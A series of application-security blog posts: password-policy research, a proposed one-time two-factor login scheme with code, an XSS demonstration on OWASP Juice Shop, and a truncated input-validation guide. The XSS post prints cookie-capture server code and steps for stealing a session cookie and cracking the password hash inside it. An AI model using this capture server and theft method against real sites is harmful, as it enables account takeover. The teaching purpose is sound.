  • (Research paper, 2010) The True Cost of Unusable Password Policies: Password Use in the Wild.  The authors note that users are generally cogent in their understanding of security needs, but find compliance with password policies too difficult. To cope with security demands, users develop their own strategies, which introduce problems of their own. As a consequence, the complexity of complying with security policies has an adverse effect on the security posture of organisations. For example, one user dealt with a policy that forced him to choose a password dissimilar to his previous 12 passwords by simply writing the password down so he would not forget it. In the section “Towards Holistic Password Policies”, the authors note that looking only at the technical side and ignoring the user side does not encourage security awareness; instead it introduces problems that antagonise users. Password policies need to be designed for the context in which users use the systems, with an emphasis on eliminating the risks users are likely to face in that context.
  • (Research paper, 2007) Do Strong Web Passwords Accomplish Anything?. There are many ways that an attacker may go after a user, and password policies only address defence against brute forcing attacks. They do not address phishing, key logging, shoulder surfing, insecure password storage on local machines, or guessing based upon special knowledge about the user. Although strong passwords do help in some cases, there are other, more user-friendly security controls that could be put in place of a complex password policy. These other controls make strong password policies less important. The paper argues:

    “Since the cost is borne by the user, but the benefit is enjoyed by the bank, user resistance to stronger passwords is predictable. We argue that there are better means of addressing brute-force bulk guessing attacks.”

    However, this paper is from 2007. See the next item, which is related but more recent:

  • (Blog, 2019) Your Pa$$word doesn’t matter.  This blog unfortunately has a misleading title that caused many readers to misjudge it before reading. It is not telling users not to choose strong passwords; instead it is saying that password complexity policies have little benefit when one considers the various ways passwords are attacked. In spirit it is similar to the previous item, but this research is more modern. It tells system administrators and security policy writers:

    “Focusing on password rules, rather than things that can really help – like multi-factor authentication (MFA), or great threat detection – is just a distraction.”

  • (Research paper, 2015) Quantifying the Security Advantage of Password Expiration Policies. The abstract gets right to the point:

    “Many security policies force users to change passwords within fixed intervals, with the apparent justification that this improves overall security. However, the implied security benefit has never been explicitly quantified. In this note, we quantify the security advantage of a password expiration policy, finding that the optimal benefit is relatively minor at best, and questionable in light of overall costs.”

    This paper does a mathematical analysis of the benefit of password expiry policies. Without considering the possibility of new passwords being related to old ones, the paper considers an attacker who keeps guessing the user’s password in an online attack, even after the password may have changed without the attacker’s knowledge. In essence, the authors show that the attacker’s chance of success is not much different from when no password expiry policy is in place, and this holds even if passwords are chosen randomly (most users don’t do this, which makes attacks easier still). The authors conclude by challenging those who favour such policies to explain why, and in which specific circumstances, a substantial benefit is evident.

  • (Research paper, 2009) It’s no secret: Measuring the security and reliability of authentication via ‘secret’ questions.  Historically, requiring users to provide answers to secret questions upon registration was a way to do account recovery in the event of a forgotten password. This paper analyses these practices and finds that 20% of users forget their own answers to secret questions within 6 months, that acquaintances can guess answers to the questions 17% of the time, and that 13% of the time an answer could be guessed within 5 attempts by trying the most popular answers. The authors conclude that these questions are neither reliable nor secure. They propose a number of options to improve secret questions or to use alternative backup authenticators, but ultimately this paper, more than any other, led to the removal of secret questions for account recovery.

Other references

  • (Microsoft blog, 2019) Security baseline (FINAL) for Windows 10 v1903 and Windows Server v1903.  Periodic password expiration will no longer be enabled in Windows 10 and Windows Server. The blog writes

    “Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value. By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance. At the same time, we must reiterate that we strongly recommend additional protections even though they cannot be expressed in our baselines.”

  • (FTC blog, 2016) Time to rethink mandatory password changes.  This is from a former Chief Technologist of the US Federal Trade Commission. The author explains why requiring users to change their passwords does more harm than good, and includes a long list of references, many of them included here, to back up the argument. While there may be reasons for you to change your password (examples are given), requiring regular changes in a password policy is not necessarily good practice:

    Research suggests frequent mandatory expiration inconveniences and annoys users without as much security benefit as previously thought, and may even cause some users to behave less securely. Encouraging users to make the effort to create a strong password that they will be able to use for a long time may be a better approach for many organizations…

Concluding remarks

The shortcomings of legacy password policies are well documented; however, there are two distinct philosophies for moving forward.  On one hand, there remains the “fix the user” philosophy, which pushes education and password managers as the main mechanisms for protecting user accounts.  The alternative is to design systems that are less reliant upon passwords as the sole determinant of authentication, which is the approach that Google and Microsoft seem to be taking (related: see Protecting User Accounts When Usability Matters).  I honestly believe that both philosophies have a place going forward.  The problem today is that there is far too much emphasis on the former and not enough effort put into the latter.  We can’t always count on people to do the right thing, but there are often things we can do to protect them when they are negligent.  Putting the burden of security complexity on the user should be the last fallback option, not the default option.

Protecting User Accounts When Usability Matters

Scenario: Password guessing attacks are happening on your website. The attacker is performing password spraying: he tries a single password for a user, and if it fails, he moves on to the next user. The attacker is also changing his IP address, including the use of IP addresses that are geolocated where many legitimate users come from.

Because of the attacker’s tactics, blocking IP addresses and account lockouts won’t work. You also work for a business that is very sensitive to security controls that impact usability. Captchas, two-factor authentication, and stronger password security policies are rejected by the business.

What can you do?

This blog is about a security control that largely prevents this type of password guessing attack with minimal usability impact. We call it One-Time Two Factor Authentication (OT2FA). It’s a simple idea derived from a number of sources, including:

Revisiting Defenses Against Large-Scale Online Password Guessing Attacks by Mansour Alsaleh, Mohammad Mannan, and P.C. van Oorschot.
Securing Passwords Against Dictionary Attacks by Benny Pinkas and Tomas Sander.
Enhanced Authentication In Online Banking by Gregory D. Williamson.

OT2FA should not be considered new, as it has strong similarities to what companies like Google and Lastpass are doing (though their implementation details are unpublished). However too many websites are doing alternatives that are both less secure and less user friendly.

One-Time Two Factor Authentication

Two-factor authentication (2FA) is an effective security control for preventing password guessing attacks, but it comes at a large usability cost: users don’t like being challenged for a one-time secret code every time they log in. Businesses that are trying to acquire new users to win market share are averse to security controls that annoy users.

But what if one could get close to the security of 2FA with little usability impact? This is what OT2FA aims to accomplish.

The idea is simple: the first time a user logs in from a new user agent (i.e. browser or client software), require them to prove their identity via two factors: their password, and a secret code that is emailed or SMSed to them (note: email is preferable as SMS security is known to be weak). When the user succeeds in proving their identity, provide a digitally signed token, such as a JWT, back to the user agent: “User X signed in from this device before.” Instead of the actual user name, something like a UUID should be used for the identity, which is tied to the username inside the server database. The token, called an OT2FA token, serves the purpose of marking that user agent trusted for that user. For web browsers, it is particularly convenient to store it in a cookie.

The next time that same user logs in from that user agent, they only need to provide the username and password, and the OT2FA token is sent up transparently as the second-factor proof of identity. The server authenticates the user by verifying that the username and password are correct, that the digital signature on the OT2FA token is valid, and that the identity in the OT2FA token maps to the username provided. If all checks pass, access is granted without a 2FA challenge. In other words, the second-factor challenge happens only the first time the user logs in from a particular user agent, and then the user never sees the second-factor challenge on that user agent again. Hence the name: One-Time Two Factor Authentication.
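The minting and verification steps above can be sketched as follows. This is an illustrative stdlib-only implementation (the function names, token format, and signing key are all assumptions; a standard JWT library would serve equally well):

```python
import base64
import binascii
import hashlib
import hmac
import json

SERVER_KEY = b"replace-with-a-long-random-secret"  # hypothetical server-side signing key

def _sign(payload: bytes) -> str:
    mac = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode()

def mint_ot2fa_token(user_uuid: str) -> str:
    """Issued once the user passes the one-time second-factor challenge.
    Note the token carries a UUID, not the username itself."""
    payload = json.dumps({"sub": user_uuid}).encode()
    return base64.urlsafe_b64encode(payload).decode() + "." + _sign(payload)

def verify_ot2fa_token(token: str, expected_uuid: str) -> bool:
    """Valid signature AND the token's identity maps to the logging-in user."""
    try:
        body, sig = token.split(".")
        payload = base64.urlsafe_b64decode(body)
    except (ValueError, binascii.Error):
        return False
    if not hmac.compare_digest(sig, _sign(payload)):
        return False
    return json.loads(payload).get("sub") == expected_uuid
```

The signature check runs before the payload is trusted, so a tampered token is rejected without its contents ever being interpreted.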

This protection is not perfect, but it is a huge improvement in security at little impact to the user. The main thing is that it stops the large scale password guessing attacks: an attacker can only succeed against a user if he not only knows the username and password, but can also crack the second factor or somehow get the user’s OT2FA token. If we assume that no attacker is going to collect a large number of user OT2FA tokens (discussed further in the Potential Concerns section below), then we can be confident that we have stopped the large scale password guessing attacks.

For emphasis, OT2FA is designed only to prevent password guessing attacks against users. There is no need to challenge the user for a second factor when they sign up for an account – new users should get an OT2FA token by default.

Below, we will discuss enhancements and then potential security concerns, but let’s first review where we are. In the context of password guessing attacks, username/password-only is low security, but very usable. Two factor authentication is high security, but scores low on the usability scale. OT2FA is not as secure as 2FA nor as user-friendly as username/password-only, but it is not bad in either category, and could arguably be considered good in both. Therefore OT2FA is a realistic security option for websites built with a strong emphasis on usability.


Enhancements

There are many directions in which one can enhance this idea.

For example, by including a unique identifier for each OT2FA token and storing the corresponding value in the database, you can give users the option to revoke OT2FA tokens living on trusted devices / user agents that should no longer be trusted for that user. So although you cannot make the OT2FA token go away, you can enforce on the server side that the specific OT2FA token being sent up is one that the user has not revoked. Some subtleties are discussed in Footnote 1 at the bottom.

As an alternative to maintaining server side state for revocation purposes, one could expire the OT2FA token. Indeed, many implementations (Gmail, Lastpass, Azure DevOps, etc…) do this with a fixed expiry, asking the user for a new 2FA challenge on a regular basis. The problem with expiring the token after a fixed interval is that it no longer meets the “one time” goal of this design.

A more user-friendly approach than fixed token expiry is to set an initial expiry, but generate a new token with an extended expiry each time the user returns. This mimics how “remember me” functionality is often implemented. If a user’s OT2FA token becomes known to an attacker, the user’s only defence is his password, which needs to be strong enough to keep the attacker out until the compromised OT2FA token expires.  Although this is less than ideal, attackers are largely limited in the number of accounts they can go after, assuming there is no mass OT2FA token leakage.

Another direction is that OT2FA can be combined with (temporary) account lockout. Different failed-password-attempt thresholds can be allowed depending upon whether or not a valid OT2FA token is present. For example, one can impose a temporary lockout when the OT2FA token is not present, but still allow logins when the token is present, provided that the second (higher) threshold for failed password attempts is not reached. This lets legitimate users coming from trusted user agents in easily while keeping attackers out. It also mitigates the risk of an attacker locking a legitimate user out of his account.
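A minimal sketch of the dual-threshold idea follows. The thresholds and lockout duration are illustrative, not recommendations; tracking failures per (user, token-presence) pair is what keeps an attacker without a token from locking out the user's trusted devices:

```python
from collections import defaultdict

LIMIT_NO_TOKEN = 5        # strict limit for attempts without a valid OT2FA token
LIMIT_WITH_TOKEN = 20     # laxer limit from an already-trusted user agent
LOCKOUT_SECONDS = 15 * 60

_failures = defaultdict(int)       # (username, has_token) -> consecutive failures
_locked_until = defaultdict(float) # (username, has_token) -> lockout expiry time

def login_allowed(username: str, has_valid_token: bool, now: float) -> bool:
    return now >= _locked_until[(username, has_valid_token)]

def record_failed_password(username: str, has_valid_token: bool, now: float) -> None:
    key = (username, has_valid_token)
    _failures[key] += 1
    limit = LIMIT_WITH_TOKEN if has_valid_token else LIMIT_NO_TOKEN
    if _failures[key] >= limit:
        _locked_until[key] = now + LOCKOUT_SECONDS  # temporary, not permanent
        _failures[key] = 0
```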

Another idea is allowing more than one user to log in from a single user agent, for shared devices/computers. However, there is a risk of over-engineering the implementation for limited benefit.

One can also consider a number of options for rolling this out smoothly, so that the technology is as transparent as possible when a company first adopts it for an existing user base. There are many approaches for that, which would be too much of a tangent to expound upon here.

Aside: Clarification on Tokens

OT2FA tokens should not be confused with session ids or session tokens.

Session ids/tokens are high value and relatively short lived.  If an attacker captures a session token, he then can hijack the victim’s account.

OT2FA tokens are long-lived tokens and are insufficient for hijacking an account.  OT2FA tokens serve one purpose: to limit the ability of a hacker to perform password guessing attacks on user accounts.

Potential Concerns

The implementation may leak the validity of the password: The most straightforward implementation is to challenge for the second factor only after the username and password are confirmed. Note that if it is not implemented this way, then (under some implementation assumptions) the user would be notified every time somebody malicious tries an incorrect password for that user, which would be annoying and a cause of unnecessary stress.

The fact that the validity of the password is leaked is not necessarily a bad thing. In fact, depending upon the wording of the email/SMS carrying the second-factor code, it may be a good thing, because it alerts the user that there is good reason to change his password. For example, a notice like:

“A new device has attempted to login to your account! If this is you, please click this link to prove your identity.
If this was not you, then it means that somebody has your password. Don’t panic: we have protected access to your account. However, we recommend that you change your password to prevent this person from continuing to attempt to access your account.”

Remark: The academic research papers mentioned above are more sophisticated than OT2FA and attempt to hide the validity of the password (see Section 4 of the Pinkas and Sander paper). But they do so using captchas, which we consider a no-no for usability and accessibility reasons. Not to mention that machines now seem to be better than humans at captchas, which defeats the whole point of the technology.

Brute forcing the second factor: When a hacker gets the username and password correct, he can then focus his attention on brute forcing the second factor. This is only practical for the attacker if the second factor is brute-forceable (for example, a 6-letter code), in which case it needs to be prevented in some way. For example, after too many wrong second-factor guesses, impose a temporary account lockout for devices that do not have a valid OT2FA token for that user. The length of the lockout should depend upon the time to brute force the second-factor challenge, and the user should be notified of the lockout via email or SMS.
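A back-of-the-envelope calculation shows why pairing a guess limit with a temporary lockout makes brute-forcing a short code impractical. The numbers below (a 6-digit numeric code, 5 guesses per 15-minute lockout) are purely illustrative:

```python
def expected_bruteforce_seconds(code_space: int, guesses_per_lockout: int,
                                lockout_seconds: float) -> float:
    """Expected time to guess a random code when only a handful of guesses
    are permitted between temporary lockouts."""
    expected_guesses = code_space / 2              # on average, half the space
    lockouts_needed = expected_guesses / guesses_per_lockout
    return lockouts_needed * lockout_seconds

# A 6-digit code, 5 guesses allowed per 15-minute lockout:
seconds = expected_bruteforce_seconds(10**6, 5, 15 * 60)
years = seconds / (365 * 24 * 3600)   # roughly 2.9 years on average
```

And since each wrong-guess lockout also triggers a notification, the user would be alerted to the attack long before those years elapse.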

Private browsing: Users of private/incognito browsing may be forced to do 2FA every time, because the OT2FA token does not persist on the client device. Allowing security- and privacy-conscious individuals to opt out is one compensating control to address this.

Public/shared computers: You would not want to store the OT2FA token on a shared computer, because this would allow a hacker to capture it and then brute force the password without the second factor challenge. The first defence is to allow the user to click “shared computer” upon login, which will prevent the token from being stored on it. Having a revocation mechanism (see enhancements section) is a second defence.

Stolen OT2FA token: One way to reduce the risk of cookie theft is to make cookies httpOnly. But this alone cannot be relied upon, since there are a number of ways cookies may leak – not to mention that you might not even be using cookies for storing the token.

If the OT2FA token is stolen, it reduces to the security of password-only for that user – assuming the attacker knows to whom the token belongs. Having a revocation mechanism (as described above) is a compensating control.

Mass OT2FA token leakage: If there is mass token theft, then security reduces to password-only, under the assumption that the attacker can map each token to a username. Usernames should not be put in tokens; instead, store unique identifiers that are mapped to the user via the database. If an attacker is able to abuse a large number of these tokens, it implies that he has not only the tokens but also the mapping between tokens and users. This is a bad situation, and it requires a serious response from the owners of the website. The recommended action is to roll the key used for signing the OT2FA tokens, which means each user has to perform the OT2FA on each of their user agents again.
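Rolling the key can be as simple as replacing the server-side signing key, which instantly fails verification for every outstanding token. A sketch (in production the key would live in a secrets store, not a module-level variable):

```python
import hashlib
import hmac
import os

_signing_key = os.urandom(32)   # current server-side signing key

def sign(payload: bytes) -> bytes:
    return hmac.new(_signing_key, payload, hashlib.sha256).digest()

def signature_valid(payload: bytes, sig: bytes) -> bool:
    return hmac.compare_digest(sig, sign(payload))

def roll_signing_key() -> None:
    """After mass token theft: every existing OT2FA token now fails
    verification, so each user agent must redo the one-time 2FA."""
    global _signing_key
    _signing_key = os.urandom(32)
```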

User loses access to email: If the user loses access to the email address that the second-factor authentication requests are sent to, then he cannot add a new user agent as trusted. However, if the user has at least one already-trusted user agent, he can use it to update his email address on the system, working around the problem. When a user’s email address is changed, an email should be sent to the previous address to make sure the change was not malicious. There are other controls that can be added to reduce the risk of a hacker who succeeds in defeating the OT2FA locking a user out of his account.


Is this the same as the OWASP page on device cookies? No. It is similar, but the OWASP description gives out device cookies upon a valid username/password without requiring second-factor authentication. As mentioned on the OWASP page, it does not stop password spraying attacks the way OT2FA does. It also cites as its source Marc Heuse and Alec Muffett, whose discussions on the topic came years after the research cited at the top of this blog.

Is it just risk based authentication? Risk based authentication was first described in Enhanced Authentication In Online Banking by Gregory D. Williamson in 2006, which we cited at the beginning. The document recommends a number of ideas for enhancing security, such as:

    “Machine Authentication, or PC fingerprinting, is a developing and widely used form of authentication (FFIEC, 2005). This type of authentication uses the customer’s computer as a second form of authentication (PassMark Security, n.d.). Machine authentication is the process of gathering information about the customer’s computer, such as serial numbers, MAC addresses of parts in the computer, system configuration information, and other identifying information that is unique to each machine. A profile is then built for the user and the machine. The profile is captured and stored on the machine for future use by the authentication system (PassMark Security, n.d.). Once the PC fingerprint is gathered, the system knows what machine attributes should be present when the user attempts to access their online bank account (Entrust, 2005). This type of authentication usually requires the user to register the machine at first sign on. If a customer logs in from another computer the system will know to further scrutinize the login attempt. At this point the system can prompt for additional authentication, such as out of band authentication or shared secret questions.”

The concepts here are very similar to the description of OT2FA except they use device fingerprinting instead of digital signatures to identify devices. Indeed, if one Googles for risk based authentication, many websites (example) talk about device fingerprints without mentioning the concept of digital signatures.

Device fingerprints are less preferable than digital signatures. Through reverse engineering, one can determine what device properties are used for the fingerprint. Depending upon the exact details, a hacker could potentially brute force the fingerprint of a victim once he knows the password. In contrast, brute forcing a cryptographic digital signature is not practical, assuming the crypto is done correctly.

In general, OT2FA is a special case of risk based authentication. It is a particularly simple and strong way of implementing the concept.


When security does not have an adequate answer, we often transfer the burden to the user. Putting too much burden on the user is bad security practice, as it violates the important security principle of psychological acceptability.

In regard to login security, complex passwords, password rotation, captchas, 2FA, etc… are all poor solutions for a general audience due to the burden they put on users. Users resoundingly reject these ideas and technologies for day-to-day online activities, so something better is needed.

OT2FA is a practical tradeoff between security and usability. It offers much stronger than username/password-only security at very little usability impact. It can also fairly easily be implemented by any organisation. Most importantly, it is a realistic/practical solution for stopping large scale password guessing attacks without significantly burdening users.


Footnote 1: If one takes the approach of putting a unique identifier in the OT2FA token for revocation purposes, the use of server-side persistent storage can change the whole implementation: rather than using digital signatures on the tokens, store a copy of each non-revoked token for each user in server-side persistent storage.  When a user logs in with an OT2FA token, a simple verification that the token is in the server-side database for that user takes the place of any digital signature check.  The major downside of this approach is that it requires more storage: one token per device per user, and any user could potentially generate a large number of them for himself by automated means.  If this is considered a threat, then obvious mitigating controls can be put in place.
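The footnote's server-side variant could be sketched as follows, with opaque random tokens and a membership check in place of any signature check (all names here are illustrative):

```python
import secrets
from collections import defaultdict

_issued = defaultdict(set)   # user_id -> set of non-revoked opaque tokens

def issue_token(user_id: str) -> str:
    token = secrets.token_urlsafe(32)   # unguessable opaque value, nothing to sign
    _issued[user_id].add(token)
    return token

def token_valid(user_id: str, token: str) -> bool:
    return token in _issued[user_id]    # membership check replaces signature check

def revoke_token(user_id: str, token: str) -> None:
    _issued[user_id].discard(token)     # user-initiated revocation of a device
```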


The author would like to thank Dharshin De Silva for feedback on a preliminary version of this document.

Demonstrating Reflected versus DOM Based XSS

Update January 2019: Recent changes to the heroku Juice Shop app have broken this demo.  I may update the demo and the blog at a later time.

In my employment, I am responsible for making sure developers produce secure code, and security education is a key part of reaching this goal.  There are many ways that one can approach security education, but one thing that I have found is that developers really appreciate seeing how attacks are performed and exploited in practice, so hacking demonstrations and workshops have so far been a hit.

In doing these demonstrations, I have found two intentionally insecure test sites that have very similar cross site scripting (XSS) vulnerabilities – Altoro Mutual and OWASP Juice Shop. In fact, on the surface the vulnerabilities look identical, but under the hood they are different: Altoro Mutual has a reflected XSS whereas the Juice Shop has DOM-based XSS. It turns out that DOM-based XSS is much more convenient to demonstrate in a corporate environment for a few reasons, and in general more favourable to an attacker.

In this blog, I explain why and show you how to build a really cool demo of exploiting the OWASP Juice Shop DOM-based XSS. You will need a malicious server for the demo, but I have the code and a sample server all ready for your convenience. The demo uses the malicious server to steal the victim’s cookie, and from there we are able to retrieve his password. Full details below.


If you are not familiar with XSS, this section is for you. Everyone else, skip to the good stuff below.

XSS is when an attacker can get his own JavaScript to execute from somebody else’s website, and in particular in the browsers of one or more victim users.

The most famous XSS attack that I know of is the “Samy is my Hero” MySpace worm.  Although not as malicious as it could have been, Samy Kamkar created a script on MySpace that would send Samy a friend request and copy itself onto the victim’s MySpace profile, along with displaying the string “but most of all, samy is my hero” on the profile. Within 20 hours, Samy had over one million friend requests.

The Samy worm was a persistent XSS, which means the script was permanently stored in the database. Persistent XSS vulnerabilities are the worst kind because everyone becomes vulnerable just by visiting the site.

Two other XSS types are reflected and DOM-based, which you will learn about in good detail by reading this blog. These are both less severe than persistent because the victim needs to be tricked into hitting the vulnerability (i.e. social engineering), but we will see that the consequences can be pretty bad for those who fall victim.  I have not seen any comparison of the severity of the two, but below I make the argument that DOM-based is more serious than reflected.

The Two Vulnerabilities

Let’s start with Altoro Mutual. In the search bar, you can type a script, for example a simple alert(“hello”) surrounded by <script> open and close tags [screenshot: altoro_search]. Upon hitting enter, you might see that the script executes (reflected XSS) [screenshot: altoro_mutual_xss]. However, you also might not see this. If you try running it in a corporate environment, the company proxy might have stopped it (one of the problems I ran into). If you use Chrome, you might find that Chrome blocked it (one of the problems the audience ran into when trying it) [screenshot: chrome_blocks_reflected]. There are workarounds for both cases, but it blunts the point about the severity of the issue when the attack only works in special cases.

Now let’s try the exact same thing in OWASP Juice Shop. Type your script into the search bar [screenshot: juice_search]. Upon hitting enter, I’m quite sure you will see the script execute (DOM-based XSS) [screenshot: juice_xss]. In my case, neither the corporate proxy nor Chrome blocked it. There is a good reason for that.

Looking Closer

Let’s first confirm that the Altoro Mutual vulnerability is really reflected XSS and the OWASP Juice Shop one is really DOM-based. We do that by sending the traffic through your favourite intercepting proxy. For Altoro Mutual [screenshot: reflected_altoro], we see that the script entered in the search bar was reflected back as part of the html.
Now do the same with the Juice Shop [screenshot: dom_juice_shop]: the script was not reflected back.

You can look further. If you open up your browser developer tools, you will see that the search value gets put into the html via client-side JavaScript. Inside the default Juice Shop html there is an input form which contains:


The ng-model is AngularJS functionality. AngularJS by default escapes content to prevent XSS, unless you code your JavaScript in a really dumb way, which was intentionally done for the Juice Shop:

r.searchQuery = t.trustAsHtml(

The trustAsHtml is an Angular method that bypasses the default escaping.

Corporate proxies and most browsers (Firefox currently does not) can easily block reflected XSS by checking whether the outgoing request contains a script and whether the exact same string comes back in the response. They can stop the hack as it is happening.

The same protection does not happen for DOM-based XSS. The attack happens entirely in the browser, which prevents corporate proxies from stopping it. It is a lot trickier for a browser to stop this type of attack than it is for one to stop reflected XSS.

Demonstrating Real Exploitation of DOM-based XSS

Although one can explain to developers and business people the dangers of XSS, nothing is more convincing than a real demonstration, and the OWASP Juice Shop is perfect for this. In our demonstration, we need a malicious server. I have created one for you that you can deploy in a couple of minutes on Heroku: see github link. To speed things up, you can use my temporary server (to be taken down later).
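If you would rather read the idea than deploy it, here is a minimal sketch of such a capture server using only the Python standard library. The /recorddata and /dumpdata endpoint names match the demo; everything else (the query parameter name, the responses, in-memory storage) is my assumption, not the actual github code:

```python
# Minimal sketch of a cookie-capture server. The stolen cookie arrives
# as a query parameter on /recorddata; /dumpdata shows what was captured.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

captured = []  # in-memory store; a real server would use a file or database

def record(cookie):
    captured.append(cookie)

def dump():
    return "\n".join(captured)

class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        url = urlparse(self.path)
        if url.path == "/recorddata":
            # the XSS payload sends the victim's cookie as ?c=<cookie>
            record(parse_qs(url.query).get("c", [""])[0])
            body = b"thanks"
        elif url.path == "/dumpdata":
            # the attacker views everything captured so far
            body = dump().encode()
        else:
            body = b"free juice coming soon"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

def run(port=8000):
    HTTPServer(("", port), CaptureHandler).serve_forever()
```

The point is how little an attacker needs: a dozen lines of wiring around an append and a join.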

In our demo, assume a user has logged into the OWASP Juice Shop. The user visits a malicious website that has a link promising free juice if you click it. Clicking the link triggers an XSS that takes the victim’s cookie and sends it to a “/recorddata” endpoint on the malicious server. From there, the attacker can hit a “/dumpdata” endpoint to display the captured cookies. The cookies contain JWTs, which when decoded, contain the MD5 hash of the user password (very dumb design, but I have seen worse in real code that was not intentionally insecure). Using Google dorking, the MD5 hash can be inverted to recover the victim’s password. Full details below.

First head over to the OWASP Juice Shop and click Login. From there, you can register [screenshot: 01_login_juice] and create the account of your victim user [screenshot: 02_create_account]. Next, the victim logs in [screenshot: 03_victim_login]. All is fine and dandy, until somebody tells the victim about a website that offers free juice to OWASP Juice Shop customers. What could be better! The victim rushes to the site (our temporary deployment). Upon clicking the link, the DOM-based XSS is triggered [screenshot: 05_link_clicked]. A nontechnical user would likely not realise that a script from the malicious site has executed. In fact, in this case, the script has taken the victim’s cookie and sent it to the malicious website, whose “/recorddata” endpoint records the cookie in a temporary file (a more serious implementation would use a database). Our malicious server also has a “/dumpdata” endpoint for displaying all the captured cookies [screenshot: 06_retrieve_cookie].
Inside the cookie is a JWT. Let’s copy that JWT to the clipboard [screenshot: 07_copy_cookie] and head over to a site where we can paste the token in and decode it [screenshot: 08_jwt_decoded]. Amazing! The username and password are in the cookie. But that’s not the real password, so what is it? Let’s Google it [screenshot: 09_google_dorking]. Clicking the first link, we find out that it was the MD5 hash of the password, and the real password is revealed [screenshot: 10_get_password].
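To see that this decoding step is nothing magic, the following sketch builds and then decodes a token of the same general shape (the claim names, email, and password here are made up; the Juice Shop's actual claims differ). The payload is just base64url-encoded JSON, with the password stored as an unsalted MD5 hex digest:

```python
# Build and decode a JWT-shaped token to show the payload is readable
# by anyone. Claim names and values are illustrative, not Juice Shop's.
import base64, hashlib, json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

payload = {"email": "victim@juice-sh.op",
           "password": hashlib.md5(b"banana").hexdigest()}  # unsalted MD5!
token = ".".join([b64url(b'{"alg":"none"}'),
                  b64url(json.dumps(payload).encode()),
                  ""])

# Decoding: split on '.', restore the stripped '=' padding, b64url-decode
middle = token.split(".")[1]
middle += "=" * (-len(middle) % 4)
claims = json.loads(base64.urlsafe_b64decode(middle))
print(claims["password"])  # a 32-char MD5 hex digest, ready for Google dorking
```

Because unsalted MD5 hashes of common passwords are all over the web, this is the step that makes the Google dork work.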


I have found that rather than being taught boring coding guidelines, developers much prefer to see security vulnerabilities and how they are exploited in practice. Once they understand the problems, they find a way to code properly.  Developers are very good at using Google to find answers once they understand the problem they are trying to solve.

The OWASP Juice Shop is a great website for demonstrating security vulnerabilities, but in some cases you need to add your own parts to make the demo complete. In this blog, we provided the malicious server that executes a DOM-based XSS when a user clicks a link, which allows the attacker to recover the user’s password. The Juice Shop DOM-based XSS is much more convenient to demonstrate exploitation than the reflected XSS in Altoro Mutual.

For those familiar with CVSS for rating security vulnerabilities, the rating includes an attack complexity parameter indicating whether special conditions need to exist for the attack to succeed. For reflected XSS, two special conditions were mentioned above: the victim’s browser must not defend against the attack (most browsers will stop it) and the victim must be in an environment where the attack is not blocked. For DOM-based, there appear to be no special conditions (browsers will not block DOM-based attacks, and the environment is irrelevant). Hence DOM-based XSS is more favourable to attackers than reflected XSS, the difference being the complexity of pulling off the attack. Therefore, DOM-based XSS is more severe than reflected XSS, but less severe than persistent.

Secure Coding: Understanding Input Validation

Developers are often provided with a large amount of security advice, and it is not always clear what to do, how to do it, and how important it is. Especially considering that security advice has changed over time, it can be confusing. I was motivated to write this blog because the best guide I found on input validation is very dated, and I wanted to provide clear, modern guidance on the importance of the topic.  There is also the OWASP Input Validation Cheat Sheet as another source on this topic.

This blog is targeted to developers and Application Security leads who need to provide guidance to developers on best practices for secure coding.

Input validation is the first line of defence for secure coding. There are many ways that a hacker will go after your software, and it would be naive to assume that you know all of them. The point of input validation is that, when done correctly, it will stop a number of attacks that you will not foresee. When it doesn’t completely stop them, it usually makes them more restricted or more difficult to pull off. Remember: input validation is not about stopping specific attacks, but is instead a general defence for stopping any number of attacks.

Input validation is not hard to do, but sometimes it takes time to figure out what character set the data should conform to. This blog will be primarily focused on web applications, but the same concepts apply in other scenarios.

Below is guidance on how to do it, when to do it, and examples of how input validation might save you if you got other parts of the coding wrong. It must be emphasised that input validation is not a panacea, but when done correctly, it sure makes your application a lot more likely to resist a number of attacks.

What is input validation?

Hackers attack websites by sending malicious inputs. This could be through a web form or AJAX request, by sending requests directly to your API with tools such as curl or python, or by using an intercepting proxy (typically Burp, but other tools include ZAP and Charles), which is somewhere in between the former two methods.

Input validation means to check on the server side that the input supplied by the user/attacker is of the form that you expect it to be. If it is not of the right form, then the data should be rejected, typically with a 400 http status code.

What is meant by right form? At the minimum, there should be a check on the length of the data, and the set of characters in the data. Sometimes, there are more specific restrictions on the data — consider some insightful examples below.

Example: phone number. A phone number is primarily digits, with a maximum of 15 digits. If you allow international numbers, then plus (‘+’) is a valid character. If the area code is in parentheses, then the parentheses are additionally valid characters. If you want to allow the user to enter dashes or spaces, then you can add those to the list of allowed characters as well, though you don’t need to (front end developers can make it so that the user does not need to send such data). In total we have at most 15 different valid characters and at most 15 digits: this is your validation rule. Additionally, you should always have a limit on the total length of the string supplied (including parentheses, spaces, dashes, pluses) to stop malicious users from fiddling.

Example: last name. This one is more complicated, but a Google search gives us a pretty good answer. Importantly, you need to allow hyphens (Hector Sausage-Hausen); spaces, commas, and full stops (Martin Luther King, Jr.); and single quotes (Mathias d’Arras). See also the comments that identify extra characters that should be included if one wants to truly try to accept all international names, but it depends upon your application. As for length limit, if you really want to allow the longest names in the world, you can, but I would personally think a limit like 40 characters is sufficient.

Example: email address. Email addresses are an example where the character set is well defined but the format is restricted. There are published regular expressions all over the web that tell you how to validate email addresses, and this one looks quite useful because it shows how to do it in many different languages.

Example: a quantity. A common requirement for ecommerce applications is to allow the customer to choose some number of items. Quantities should be positive integers, and there should be some reasonable upper limit to how many the person can choose. For example, you might allow only the quantities 0, 1, 2, …, 99 and anything else is rejected.
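The examples above can be sketched as white list validators (Python; the exact rules here are illustrative and should be tuned to your application):

```python
# Illustrative white list validators for the four examples above.
# Each returns True only for input matching the expected form.
import re

MAX_NAME_LEN = 40  # illustrative cap from the last-name discussion

def valid_phone(s):
    # at most 15 digits; plus, parentheses, spaces, and dashes also allowed
    return (len(s) <= 20
            and re.fullmatch(r"[0-9+() \-]+", s) is not None
            and sum(c.isdigit() for c in s) <= 15)

def valid_last_name(s):
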